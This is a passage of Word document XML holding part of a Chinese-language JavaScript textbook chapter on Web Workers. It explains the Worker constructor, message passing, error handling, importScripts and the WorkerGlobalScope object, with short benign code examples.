        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var loader=new Worker("utils/loader.js");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>采用的是相对路径，那么是以包含调用</w:t>
      </w:r>
      <w:r>
        <w:t>Worker()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数脚本的文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>为参照的。而如果指定的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>采用的是绝对路径，那么必须和包含该脚本的文档是同源的（同样的协议、主机名和端口）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一旦获取到</w:t>
      </w:r>
      <w:r>
        <w:t>Wor</w:t>
      </w:r>
      <w:r>
        <w:t>ker</w:t>
      </w:r>
      <w:r>
        <w:t>对象后，就可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来传递参数了。传递给</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的值会复制（参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结构性复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>），最终的副本会通过</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>事件传递给</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>loader.postMessage("file.txt");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是没有参数的，而</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是有的（参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）。还有，</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法在主流浏览器中都会正确地复制消息，不像</w:t>
      </w:r>
      <w:r>
        <w:t>Wi</w:t>
      </w:r>
      <w:r>
        <w:t>ndow.postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>，在一些重要的浏览器中，对字符串消息仍然是有限制的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以通过监听</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象上的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>事件来接收来自</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的消息：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>worker.onmessage=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var message=e.data;//</w:t>
      </w:r>
      <w:r>
        <w:t>从事件对象中获取消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("URL contents:"+message);//</w:t>
      </w:r>
      <w:r>
        <w:t>用它进行一些操作</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如果</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>抛出了异常，并且它自己没有对其进行捕获和处理，可以作为监听的一个</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>事件来传递该异常：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>worker.onerror=function(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>记录错误消息日志：包括</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的文件名和行数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("Error at"+e.filename+":"+e.lineno+":"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.message);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和所有的事件目标一样，</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象也定义了标准的</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>removeEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，如果想要管理多个事件处理程序，可以使用这些方法来代替</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象还有另一个方法：</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>erminate()</w:t>
      </w:r>
      <w:r>
        <w:t>。该方法强制一个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程结束运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="554" w:name="22_4_2_WorkerZuo_Yong_Yu_"/>
      <w:r>
        <w:t>22.4.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>作用域</w:t>
      </w:r>
      <w:bookmarkEnd w:id="554"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在通过</w:t>
      </w:r>
      <w:r>
        <w:t>Worker()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建一个新</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，指定了包含</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码文件的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。该代码会运行在一个全新的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>运行环境中，完全和创建</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的脚本隔离开来。</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>全局对象表示了该新的运行环境。</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在某种程度上来说是大于核心的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>全局对象，但又小于整个客户端的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Worke</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>对象一样，</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>对象也有一个</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和一个</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序的属性，不过使用方法恰好相反：在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>中调用</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会触发</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>外部的一个</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>事件，而</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>外部传递的消息会转换成一个事件，并传递给</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>是一个供</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>使用的全局对象，因此该对象上的</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>属性在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>代码中使用</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，看起来就像是全局函数和全局变量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>函数允许</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>将自己终止，它从效果上来说和</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>terminate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法类似。但是，要注意的是，在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象上没有定义任何</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>用于检测是否</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>已经将自己关闭了，也没有类似</w:t>
      </w:r>
      <w:r>
        <w:t>onclose</w:t>
      </w:r>
      <w:r>
        <w:t>这样的事件处理程序属性。如果在一个已经关闭的</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>上调用</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，那么消息会被无声无息地丢弃，而且也不会有任何错误抛出。因此，如果一个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>想要使用</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将自己关闭，那么最好是先传递诸如</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>关</w:t>
      </w:r>
      <w:r>
        <w:t>闭</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>这样的消息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>对象上定义的最有意思的全局函数是</w:t>
      </w:r>
      <w:r>
        <w:t>importScripts()</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>使用此方法来加载任何需要的库代码。如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在开始工作前，先载入需要的类、工具函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>importScripts("collections/Set.js","collections/Map.js","utils/base64.js");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>importScripts()</w:t>
      </w:r>
      <w:r>
        <w:t>方法接受一个或者多个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>参数，每个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>都需指向一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码文件。相对地址的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>以传递给</w:t>
      </w:r>
      <w:r>
        <w:t>Worker()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>为参照。它会按照指定的顺序依次载入并运行这些</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>文件。如果载入脚本的时候抛出了网络错误，或者在执行的时候抛出了错误，那么剩下的脚本都不会载入和运行。通过</w:t>
      </w:r>
      <w:r>
        <w:t>importScripts()</w:t>
      </w:r>
      <w:r>
        <w:t>方法载入的脚本自身还可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>importScripts()</w:t>
      </w:r>
      <w:r>
        <w:t>方法载入它需要的文件。但是，要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>importScripts()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不会试图去跟踪哪些脚本已经载入了，也不会去防止循环依赖的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>importScripts()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个同步的方法：它直到所有的脚本都已经载入并运行完成才</w:t>
      </w:r>
      <w:r>
        <w:t>会返回。一旦</w:t>
      </w:r>
      <w:r>
        <w:t>importScripts()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回就可以开始使用载入的脚本了：这里不需要回调函数或者事件处理程序。一旦对客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>异步的特性根深蒂固之后，再回到简单的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>同步编程方式会感觉很不适应。但是，这就是线程之美：可以在一个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>中使用阻塞式函数，而不会导致主线程中的事件循环，也不会阻塞在其他</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>中并行执行的计算。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>执行模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程从上到下同步运行它们的代码（以及所有导入的脚本），然后进入一个异步阶段，来对事件以及计时器做出响应。如果</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>注册了</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>nmessage</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序，那么只要</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>事件有可能触发，那么它将永远不会退出。但是，如果</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>没有监听消息，那么一直到所有任务相关的回调函数都调用以及再也没有挂起的任务（比如下载和计时器）之后，它就会退出。一旦所有注册的回调函数都已经调用之后，</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>也不再创建新任务了，这个时候线程就可以安全退出了。想象这样一个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>，它通过</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>下载一个文件，但是没有任何</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。如果该下载任务的</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序开始一个新的下载任务或者通过</w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t>Timeout()</w:t>
      </w:r>
      <w:r>
        <w:t>方法注册一个超时的程序，那么线程有了新的任务并保持运行状态；否则，线程就会退出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的全局对象，所以它有所有核心</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>全局对象拥有的那些属性，诸如</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>对象、</w:t>
      </w:r>
      <w:r>
        <w:t>isNaN()</w:t>
      </w:r>
      <w:r>
        <w:t>函数和</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。（请通过在第三部分中查询</w:t>
      </w:r>
      <w:r>
        <w:t>Global</w:t>
      </w:r>
      <w:r>
        <w:t>来获得</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>完整的列表。）然而，除此之外，</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>对象还有客户端</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象拥有的一些如下属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·self</w:t>
      </w:r>
      <w:r>
        <w:t>是对全局对象自身的引用。但是，要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:t>意义不同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>计时器方法：</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>clearTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>clearInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·location</w:t>
      </w:r>
      <w:r>
        <w:t>属性，描述传递给</w:t>
      </w:r>
      <w:r>
        <w:t>Worker()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。和</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>属性一样，此属性指向一个</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象。该对象有</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>protocol</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>hostname</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>pathnam</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>属性。在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>中，这些属性都是只读的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·navigator</w:t>
      </w:r>
      <w:r>
        <w:t>属性，指向一个对象，该对象拥有的属性和</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象拥有的那些属性类似。</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象有</w:t>
      </w:r>
      <w:r>
        <w:t>appName</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>appVersion</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>platform</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>userAgent</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>onLine</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
